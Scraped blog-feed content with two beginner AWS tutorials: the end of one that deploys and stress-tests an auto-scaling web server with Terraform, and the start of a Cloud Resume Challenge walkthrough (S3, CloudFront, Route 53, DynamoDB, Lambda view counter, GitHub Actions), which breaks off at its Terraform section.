&lt;p&gt;This Terraform configuration defines an AWS Launch Configuration named "web-launch-configuration" for creating EC2 instances with specific settings. It specifies the Amazon Linux 2 AMI (identified by the image_id "ami-0b72821e2f351e396") and sets the instance type to "t2.micro". The EC2 instances launched with this configuration will use the security group referenced by aws_security_group.web.id. Additionally, the user data script defined in the template_file data source will be executed upon instance launch to install and start a web server. The lifecycle block ensures that new instances are created before the old ones are destroyed during updates, minimizing downtime.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Auto Scaling Group
resource "aws_autoscaling_group" "web" {
  vpc_zone_identifier = [aws_subnet.private_1.id, aws_subnet.private_2.id, aws_subnet.private_3.id]
  launch_configuration = aws_launch_configuration.web.id
  min_size             = 1
  max_size             = 3
  desired_capacity     = 1

  tag {
    key                 = "Name"
    value               = "web"
    propagate_at_launch = true
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This Auto Scaling Group specifies that EC2 instances should be launched in the identified three private subnets. It maintains a minimum of 1 instance, scales up to a maximum of 3 instances based on scaling policies, and starts with a desired capacity of 1 instance. The instances are launched using the specified launch configuration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Application Load Balancer
resource "aws_lb" "web" {
  name               = "web-alb"
  internal           = false
  load_balancer_type = "application"
  security_groups    = [aws_security_group.web.id]
  subnets            = [aws_subnet.public_1.id, aws_subnet.public_2.id, aws_subnet.public_3.id]
}

resource "aws_lb_target_group" "web" {
  name        = "web-tg"
  port        = 80
  protocol    = "HTTP"
  vpc_id      = aws_vpc.example.id
  target_type = "instance"
}

resource "aws_lb_listener" "web" {
  load_balancer_arn = aws_lb.web.arn
  port              = "80"
  protocol          = "HTTP"

  default_action {
    type             = "forward"
    target_group_arn = aws_lb_target_group.web.arn
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This Terraform configuration sets up an Application Load Balancer (ALB) named "web-alb" that is publicly accessible (internal = false) and uses the specified security group and public subnets. It also creates a target group named "web-tg" to route HTTP traffic on port 80 to instances within the specified VPC, and an ALB listener that listens for HTTP traffic on port 80, forwarding it to the target group. This configuration ensures that incoming HTTP traffic is balanced across the EC2 instances registered in the target group.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;resource "aws_autoscaling_attachment" "asg_attachment" {
  autoscaling_group_name = aws_autoscaling_group.web.name
  lb_target_group_arn   = aws_lb_target_group.web.arn
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above resource attaches the ASG to the ALB's target group. This makes sure that the instances managed by the ASG are automatically registered with the ALB.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
Next are two CloudWatch Alarms. These alarms trigger if CPU usage is over 75% or below 20% for longer than 30 seconds.


# CloudWatch Alarms
resource "aws_cloudwatch_metric_alarm" "high_cpu" {
  alarm_name                = "high-cpu-utilization"
  comparison_operator       = "GreaterThanThreshold"
  evaluation_periods        = "2"
  metric_name               = "CPUUtilization"
  namespace                 = "AWS/EC2"
  period                    = "30"
  statistic                 = "Average"
  threshold                 = "75"
  alarm_actions             = [aws_autoscaling_policy.scale_out.arn]
  dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
}

resource "aws_cloudwatch_metric_alarm" "low_cpu" {
  alarm_name                = "low-cpu-utilization"
  comparison_operator       = "LessThanThreshold"
  evaluation_periods        = "2"
  metric_name               = "CPUUtilization"
  namespace                 = "AWS/EC2"
  period                    = "30"
  statistic                 = "Average"
  threshold                 = "20"
  alarm_actions             = [aws_autoscaling_policy.scale_in.arn]
  dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this block&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dimensions = {
    AutoScalingGroupName = aws_autoscaling_group.web.name
  }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;we are telling the alarm to monitor the instances in this specific ASG.&lt;/p&gt;

&lt;p&gt;Notice that we pointed alarm_actions at specific Auto Scaling policies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alarm_actions             = [aws_autoscaling_policy.scale_in.arn]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and here&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alarm_actions             = [aws_autoscaling_policy.scale_out.arn]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;These policies are created below and fire when their associated CloudWatch alarm triggers.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Auto Scaling Policies
resource "aws_autoscaling_policy" "scale_out" {
  name                   = "scale_out"
  scaling_adjustment     = 1
  adjustment_type        = "ChangeInCapacity"
  cooldown               = 30
  autoscaling_group_name = aws_autoscaling_group.web.name
}

resource "aws_autoscaling_policy" "scale_in" {
  name                   = "scale_in"
  scaling_adjustment     = -1
  adjustment_type        = "ChangeInCapacity"
  cooldown               = 30
  autoscaling_group_name = aws_autoscaling_group.web.name
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Launching
&lt;/h2&gt;

&lt;p&gt;To launch, we run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;terraform init&lt;/li&gt;
&lt;li&gt;terraform plan&lt;/li&gt;
&lt;li&gt;terraform apply&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now checking the VPC, we see that it has the public and private subnets with the route tables.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23asolmg3qy8bysgduj6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23asolmg3qy8bysgduj6.png" alt="Image description" width="800" height="307"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Navigating to EC2, we see that the ASG is correctly configured&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnyrcu08j34os4y16iwz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvnyrcu08j34os4y16iwz.png" alt="Image description" width="800" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And an EC2 instance is live&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fou2fubxl7p9affc0fwbk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fou2fubxl7p9affc0fwbk.png" alt="Image description" width="800" height="110"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Testing
&lt;/h2&gt;

&lt;p&gt;I edited the EC2 user data script to install "stress" so that once an instance launches, I can test the ASG automatically by driving up the CPU usage for a minute and then stopping.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# EC2 User Data Script
data "template_file" "userdata" {
  template = &amp;lt;&amp;lt;-EOF
              #!/bin/bash
              yum update -y
              yum install -y epel-release
              yum install -y stress
              yum install -y httpd
              systemctl start httpd
              systemctl enable httpd
              systemctl enable amazon-ssm-agent
              systemctl start amazon-ssm-agent
              echo "Hello World from $(hostname -f)" &amp;gt; /var/www/html/index.html
              # Run stress for 1 minute to simulate high CPU usage
              stress --cpu 1 --timeout 60
            EOF
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Another way to do this is to SSH directly into an EC2 instance and run stress manually. For that, we have to make sure the instances in the private subnets have outbound access to the internet.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Elastic IP for NAT Gateway
resource "aws_eip" "nat_eip" {
  vpc = true
}

# NAT Gateway in Public Subnet
resource "aws_nat_gateway" "nat_gw" {
  allocation_id = aws_eip.nat_eip.id
  subnet_id     = aws_subnet.public_1.id
}

# Route Table for Private Subnets
resource "aws_route_table" "private" {
  vpc_id = aws_vpc.example.id

  route {
    cidr_block = "0.0.0.0/0"
    nat_gateway_id = aws_nat_gateway.nat_gw.id # NAT gateways use nat_gateway_id, not gateway_id
  }
}

# Route Table Associations for Private Subnets
resource "aws_route_table_association" "private_1" {
  subnet_id      = aws_subnet.private_1.id
  route_table_id = aws_route_table.private.id
}

resource "aws_route_table_association" "private_2" {
  subnet_id      = aws_subnet.private_2.id
  route_table_id = aws_route_table.private.id
}

resource "aws_route_table_association" "private_3" {
  subnet_id      = aws_subnet.private_3.id
  route_table_id = aws_route_table.private.id
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By adding a NAT Gateway and updating the route table for the private subnets, we enable instances in the private subnets to access the internet for outbound traffic while remaining protected from inbound internet traffic.&lt;/p&gt;

&lt;p&gt;Now, running terraform apply will update our resources.&lt;/p&gt;

&lt;p&gt;Monitoring the CloudWatch alarms, we see that the CPU usage shoots up right away, triggering the "&lt;strong&gt;high-cpu-utilization&lt;/strong&gt;" alarm because of the stress script we assigned to the EC2 instances.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh3gks887aortmnicskuk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh3gks887aortmnicskuk.png" alt="Image description" width="800" height="400"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And here we see that a second EC2 instance is created by the ASG&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fak6bv4dkok46h6fown3p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fak6bv4dkok46h6fown3p.png" alt="Image description" width="800" height="140"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once the stress command times out after 60 seconds, the CPU usage drops below 20% and triggers the "&lt;strong&gt;low-cpu-utilization&lt;/strong&gt;" alarm.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09xzs0sus53kh4ivo0sp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F09xzs0sus53kh4ivo0sp.png" alt="Image description" width="800" height="581"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then the ASG terminates the us-east-1c EC2 instance, leaving only the instance in us-east-1a&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomvcn1s1rlexew74r7ez.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fomvcn1s1rlexew74r7ez.png" alt="Image description" width="800" height="127"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it for this project! We were able to successfully use Terraform to create an entire AWS Auto-Scaling Web Server architecture and test it ourselves. &lt;/p&gt;

&lt;p&gt;Here is the Github &lt;a href="https://github.com/aktran321/AutoScalingWebServer" rel="noopener noreferrer"&gt;repo&lt;/a&gt; if you want to try it out for yourself.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; One thing I wasn't able to do yet was SSH into the EC2 instances to test them manually; I kept getting timed out. This is why I scripted the instances to run "stress" automatically on creation.&lt;/p&gt;
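&lt;p&gt;Since the user data already enables the SSM agent, one alternative I could try instead of SSH is Session Manager, which needs no inbound ports at all. Assuming the instance profile has the AmazonSSMManagedInstanceCore policy attached, a session can be opened with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws ssm start-session --target &amp;lt;instance-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;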

</description>
    </item>
    <item>
      <title>AWS Cloud Resume Challenge</title>
      <dc:creator>Khang Tran</dc:creator>
      <pubDate>Mon, 08 Jul 2024 11:44:07 +0000</pubDate>
      <link>https://dev.to/aktran321/aws-cloud-resume-challenge-37md</link>
      <guid>https://dev.to/aktran321/aws-cloud-resume-challenge-37md</guid>
      <description>&lt;h1&gt;
  
  
  Table of Contents
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;1. Intro&lt;/li&gt;
&lt;li&gt;2. Project Initialization&lt;/li&gt;
&lt;li&gt;3. S3&lt;/li&gt;
&lt;li&gt;4. CloudFront&lt;/li&gt;
&lt;li&gt;5. Route 53&lt;/li&gt;
&lt;li&gt;6. View Counter&lt;/li&gt;
&lt;li&gt;7. DynamoDB&lt;/li&gt;
&lt;li&gt;8. Lambda&lt;/li&gt;
&lt;li&gt;9. Javascript&lt;/li&gt;
&lt;li&gt;10. CI/CD with Github Actions&lt;/li&gt;
&lt;li&gt;11. Infrastructure as Code with Terraform&lt;/li&gt;
&lt;li&gt;12. Conclusion&lt;/li&gt;
&lt;li&gt;13. Edits&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  1. Intro
&lt;/h2&gt;

&lt;p&gt;A few days ago, I decided to take on the Cloud Resume Challenge. This is a great way to expose yourself to multiple AWS services within a fun project. I'll be documenting how I deployed the project and what I learned along the way. If you're deciding to take on the resume challenge, then hopefully you can use this as a resource to get started. Now, let's begin.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Project Initialization
&lt;/h2&gt;

&lt;p&gt;Set up a project environment and configure a git repo along with it. This will first include a frontend directory with your index.html, script.js, and styles.css.&lt;/p&gt;

&lt;p&gt;If you want this done quickly, you could copy and paste your resume into ChatGPT and have it provide you with the 3 files to create a simple static website.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. S3
&lt;/h2&gt;

&lt;p&gt;Create an AWS account. Navigate to the S3 service and create a bucket. The name you choose for your bucket must be globally unique, not just unique to your region. Once created, upload your files to the S3 bucket.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. CloudFront
&lt;/h2&gt;

&lt;p&gt;S3 will only host your static website over the HTTP protocol. To use HTTPS, you will have to serve your content over &lt;strong&gt;CloudFront&lt;/strong&gt;, a &lt;strong&gt;CDN (Content Delivery Network)&lt;/strong&gt;. Not only will this provide secure access to your website, but it will deliver your content with low latency. CloudFront edge locations are global, and will cache your website to serve it fast and reliably from a client's nearest edge location.&lt;/p&gt;

&lt;p&gt;Navigate to CloudFront from the AWS console and click "&lt;strong&gt;Create Distribution&lt;/strong&gt;". Pick the origin domain (your S3 bucket). If you enabled &lt;strong&gt;Static Website Hosting&lt;/strong&gt; on the S3 bucket, a button will appear recommending the website endpoint, but skip it for our purposes, since we want CloudFront to access the S3 bucket directly.&lt;/p&gt;

&lt;p&gt;Under "&lt;strong&gt;Origin Access Control&lt;/strong&gt;", check the "&lt;strong&gt;Origin Access Control Setting (recommended)&lt;/strong&gt;". We do this because we only want the bucket accessed by CloudFront and not the public. &lt;/p&gt;

&lt;p&gt;Create a new OAC and select it.&lt;/p&gt;

&lt;p&gt;Click the button that appears and says "&lt;strong&gt;Copy Policy&lt;/strong&gt;".&lt;/p&gt;

&lt;p&gt;In another window, navigate back to your S3 bucket and under the "&lt;strong&gt;Permissions&lt;/strong&gt;" tab paste the policy under the "&lt;strong&gt;Bucket Policy&lt;/strong&gt;" section. &lt;/p&gt;

&lt;p&gt;It should look something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
        "Version": "2008-10-17",
        "Id": "PolicyForCloudFrontPrivateContent",
        "Statement": [
            {
                "Sid": "AllowCloudFrontServicePrincipal",
                "Effect": "Allow",
                "Principal": {
                    "Service": "cloudfront.amazonaws.com"
                },
                "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::&amp;lt;Your Bucket Name&amp;gt;/*",
                "Condition": {
                    "StringEquals": {
                      "AWS:SourceArn": "arn:aws:cloudfront::&amp;lt;Some Numbers&amp;gt;:distribution/&amp;lt;Your CloudFront Distribution&amp;gt;"
                    }
                }
            }
        ]
      }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the CloudFront window, finish the configuration by enabling HTTPS under "&lt;strong&gt;Viewer Protocol Policy&lt;/strong&gt;" and finally leave the rest of the options default and create the distribution.&lt;/p&gt;

&lt;p&gt;When the distribution is created, make sure the default root object is the index.html file. At this point, you should be able to open the  &lt;strong&gt;Distribution domain name&lt;/strong&gt; with your resume website up and running. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;IMPORTANT&lt;/strong&gt; You will now have a CloudFront distribution URL. Since your bucket is not public and in our current configuration, you can only access the html, css, and js files from that CloudFront distribution. Your HTML link and script tags will need to be updated. &lt;/p&gt;

&lt;p&gt;For example, my script tag was&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;link rel="stylesheet" href="styles.css"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and changed to&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;link rel="stylesheet" href="https://d2qo85k2yv6bow.cloudfront.net/styles.css"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once you update your link and script tags, re-upload your HTML file. You will also have to create an &lt;strong&gt;Invalidation Request&lt;/strong&gt; in your CloudFront distribution so that it updates its own cache. When you create the request, simply input "&lt;strong&gt;/*&lt;/strong&gt;". This makes sure that CloudFront serves the latest version of your files (if you are constantly making changes and want to see them immediately on the website, you will have to repeatedly make invalidation requests).&lt;/p&gt;
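&lt;p&gt;The same invalidation can be created from the CLI, which is handy during repeated edits (substitute your own distribution ID):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws cloudfront create-invalidation --distribution-id &amp;lt;your-distribution-id&amp;gt; --paths "/*"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;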

&lt;h2&gt;
  
  
  5. Route 53
&lt;/h2&gt;

&lt;p&gt;Your next step will be to route your own DNS domain name to the CloudFront distribution. Since I already had a domain name, I only needed to navigate to my hosted zone in Route53 and create an A record, switch on "&lt;strong&gt;alias&lt;/strong&gt;", select the dropdown option "&lt;strong&gt;Alias to CloudFront distribution&lt;/strong&gt;", select my distribution, keep it as a simple routing policy, and save.&lt;/p&gt;

&lt;p&gt;Also, within the CloudFront distribution's settings, you have to request and configure an SSL certificate associated with your domain and attach it.&lt;/p&gt;

&lt;p&gt;And with that, your website should be up and running!&lt;/p&gt;

&lt;h2&gt;
  
  
  6. View Counter
&lt;/h2&gt;

&lt;p&gt;To set up a view counter, we will now have to incorporate DynamoDB and Lambda, as well as write some Javascript for our HTML. The idea: when someone views our resume, the Javascript sends a request to the Lambda function URL. The Lambda function is some Python code that retrieves and updates data in the DynamoDB table and returns the data to your Javascript.&lt;/p&gt;

&lt;h2&gt;
  
  
  7. DynamoDB
&lt;/h2&gt;

&lt;p&gt;Navigate to the DynamoDB service and create a table.&lt;/p&gt;

&lt;p&gt;Go to "&lt;strong&gt;Actions&lt;/strong&gt;"" --&amp;gt; "&lt;strong&gt;Explore Items&lt;/strong&gt;" and create an item.&lt;/p&gt;

&lt;p&gt;Set the id (partition key) value to 1.&lt;/p&gt;

&lt;p&gt;Create a number attribute, label it "views", and give it a value of 0.&lt;/p&gt;
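&lt;p&gt;If you prefer the CLI, the same item can be seeded with a one-liner (assuming the "cloud-resume-challenge" table name that the Lambda function below uses, with the id stored as a string):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aws dynamodb put-item --table-name cloud-resume-challenge --item '{"id": {"S": "1"}, "views": {"N": "0"}}'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;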

&lt;h2&gt;
  
  
  8. Lambda
&lt;/h2&gt;

&lt;p&gt;Next, we will create the Lambda function that can retrieve the data from DynamoDB and update it.&lt;/p&gt;

&lt;p&gt;When creating the Lambda function in the AWS console, I chose Python3.12.&lt;/p&gt;

&lt;p&gt;Enable &lt;strong&gt;function URL&lt;/strong&gt; and set the AUTH type to None. Doing so allows your Lambda function to be invoked by anyone that obtains the function URL. I chose to set the Lambda function up this way so I can test the functionality of the Lambda function with my project without setting up API Gateway at the moment.&lt;/p&gt;

&lt;p&gt;Here is my Lambda function code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import json
import boto3

dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("cloud-resume-challenge")

def lambda_handler(event, context):
    try:
        # Get the current view count from DynamoDB
        response = table.get_item(Key={
            "id": "1"
        })
        if 'Item' in response:
            views = int(response["Item"]["views"])
        else:
            views = 0  # Default to 0 if the item doesn't exist

        # Increment the view count
        views += 1

        # Update the view count in DynamoDB
        table.put_item(Item={
            "id": "1",
            "views": views
        })

        # Return the updated view count
        return {
            "statusCode": 200,
            "body": json.dumps({"views": views})
        }

    except Exception as e:
        print(f"Error: {e}")
        return {
            "statusCode": 500,
            "body": json.dumps({"error": str(e)})
        }

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally, in the "&lt;strong&gt;Configuration&lt;/strong&gt;" tab, we need an execution role that has permission to access the DynamoDB table. To do this, navigate to IAM and create a new role. This role will need the "&lt;strong&gt;AmazonDynamoDBFullAccess&lt;/strong&gt;" permission. Once created, attach the role to your Lambda function.&lt;/p&gt;
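&lt;p&gt;AmazonDynamoDBFullAccess works for this project, but a tighter inline policy scoped to just this table would look something like the sketch below (the account ID is a placeholder, and the actions match the get_item/put_item calls in the function):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
      "Resource": "arn:aws:dynamodb:us-east-1:&amp;lt;account-id&amp;gt;:table/cloud-resume-challenge"
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;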

&lt;h2&gt;
  
  
  9. Javascript
&lt;/h2&gt;

&lt;p&gt;Then, write some code into your script.js file. Something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async function updateCounter() {
  try {
    let response = await fetch("Lambda Function URL");
    let data = await response.json();
    const counter = document.getElementById("view-count");
    counter.innerText = data.views;
  } catch (error) {
    console.error('Error updating counter:', error);
  }
}

updateCounter();
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The code sends a request to the Lambda function URL, parses the JSON response into the "&lt;strong&gt;data&lt;/strong&gt;" variable, and writes data.views (the retrieved view count) into the element with id="view-count".&lt;/p&gt;
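&lt;p&gt;For reference, the matching markup in index.html would be something along these lines (the surrounding text is up to you):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;p&amp;gt;Views: &amp;lt;span id="view-count"&amp;gt;0&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;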

&lt;h2&gt;
  
  
  10. CI/CD with Github Actions
&lt;/h2&gt;

&lt;p&gt;We can create a CI/CD pipeline with Github Actions. Doing so will automatically update our S3 bucket files whenever code changes are pushed to Github. &lt;/p&gt;

&lt;p&gt;To summarize, you have to create a directory "&lt;strong&gt;.github&lt;/strong&gt;" and, within it, another directory "&lt;strong&gt;workflows&lt;/strong&gt;". Create a YAML file inside.&lt;/p&gt;
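&lt;p&gt;From the project root, that structure can be created in one command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir -p .github/workflows
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;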

&lt;p&gt;This is my "&lt;strong&gt;frontend-cicd.yaml&lt;/strong&gt;" file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;on:
  push:
    branches:
    - main

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@master
    - uses: jakejarvis/s3-sync-action@master
      with:
        args: --follow-symlinks --delete
      env:
        AWS_S3_BUCKET: ${{ secrets.AWS_S3_BUCKET }}
        AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        AWS_REGION: 'us-east-1' #optional: defaults to us-east-1
        SOURCE_DIR: 'frontend' # optional: defaults to entire repository
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Your Github repo will now have a new action, but you still have to set up the secrets it references: AWS_S3_BUCKET, AWS_ACCESS_KEY_ID, and AWS_SECRET_ACCESS_KEY.&lt;/p&gt;

&lt;p&gt;Within your Github repo, you would have to navigate to Settings → Secrets and variables (under the Security Section on the left side of the screen) → Actions&lt;/p&gt;

&lt;p&gt;These access keys are associated with your AWS user and will need to be retrieved from the AWS console.&lt;/p&gt;

&lt;h2&gt;
  
  
  11. Infrastructure as Code with Terraform
&lt;/h2&gt;

&lt;p&gt;So far, we've been clicking around in the AWS console, setting permissions and configurations for multiple AWS services. It can all get confusing and messy very quickly. Terraform allows us to define our infrastructure as code, which lets us roll back configurations through versioning and easily replicate our setup.&lt;/p&gt;

&lt;p&gt;This was my first time using Terraform. For now, I just used it to create an API Gateway and re-create my Lambda function. So instead of my Javascript hitting the public function URL of my Lambda Function, I can have it hit my API Gateway, which will invoke my Lambda function. API Gateway has much better security, providing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Authentication and Authorization through IAM, Cognito, API Keys&lt;/li&gt;
&lt;li&gt;Throttling and Rate Limiting&lt;/li&gt;
&lt;li&gt;Private Endpoints&lt;/li&gt;
&lt;li&gt;Input Validation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After downloading Terraform onto my machine, I created a "&lt;strong&gt;terraform&lt;/strong&gt;" folder in the root directory of my project. Then I created two files: &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;provider.tf&lt;/li&gt;
&lt;li&gt;main.tf&lt;/li&gt;
